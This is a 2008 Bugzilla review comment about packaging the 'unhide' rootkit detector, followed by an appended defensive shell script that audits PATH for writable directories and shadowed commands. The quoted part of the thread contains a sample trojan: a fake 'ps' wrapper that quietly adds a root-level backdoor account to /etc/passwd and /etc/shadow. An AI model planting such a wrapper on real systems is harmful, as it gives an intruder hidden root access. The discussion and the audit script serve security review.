[Bug 469843] Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from rootkits

bugzilla at redhat.com bugzilla at redhat.com
Mon Dec 8 20:21:55 UTC 2008




https://bugzilla.redhat.com/show_bug.cgi?id=469843





--- Comment #6 from Till Maas <opensource at till.name>  2008-12-08 15:21:54 EDT ---
(In reply to comment #5)

> To be honest, I would not run this "security application" on my system. I am
> afraid of something along 
> cat >> /usr/local/bin/ps << EOF
> #! /bin/bash
> echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
> echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
> /etc/shadow
> /bin/ps $*
> EOF

/usr/local/bin is only writable by root and how does not packaging unhide
prevent you from this attack? Or do you never use ps without an absolute path
as root? Nevertheless, the attacker could also do this for any binary on the
system, not only ps.

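Both sides of the exchange above rest on facts that can be checked on a given host: whether a directory early in PATH is writable by anyone other than root, and whether a command there shadows a different file later in PATH. The shell functions below are an added example, not part of the original thread or of unhide; the names `split_path`, `loose_dirs` and `shadowed` are made up for this illustration.

```shell
#!/bin/sh
# Added example (not from the thread): audit a PATH-style list.

# split_path LIST: one directory per line; an empty entry means "." to the shell.
split_path() {
    printf '%s\n' "$1" | tr ':' '\n' | sed 's/^$/./'
}

# loose_dirs LIST [UID]: print directories that are group- or world-writable,
# or not owned by UID (default 0, root). -H evaluates the target of a
# symlinked directory such as /bin rather than the link itself.
loose_dirs() {
    split_path "$1" | while IFS= read -r dir; do
        [ -d "$dir" ] || continue
        find -H "$dir" -prune \( -perm -020 -o -perm -002 -o ! -user "${2:-0}" \) -print
    done
}

# shadowed LIST: print "FIRST shadows LATER" when a command name resolves in an
# earlier directory and a later directory holds a file with different content.
# Identical copies (for example /bin symlinked to /usr/bin) are not reported.
shadowed() {
    seen=$(mktemp) || return 1
    split_path "$1" | while IFS= read -r dir; do
        for f in "$dir"/*; do
            [ -f "$f" ] && [ -x "$f" ] || continue
            # Look up the first path already recorded for this command name.
            first=$(awk -F'\t' -v n="${f##*/}" '$1 == n { print $2; exit }' "$seen")
            if [ -z "$first" ]; then
                printf '%s\t%s\n' "${f##*/}" "$f" >> "$seen"
            elif ! cmp -s "$first" "$f"; then
                printf '%s shadows %s\n' "$first" "$f"
            fi
        done
    done
    rm -f "$seen"
}

# Usage: loose_dirs "$PATH"; shadowed "$PATH"
```

Any line printed by `shadowed` is a candidate for comparison against the package database, since a legitimate local override and a wrapper like the one quoted above look the same at this level.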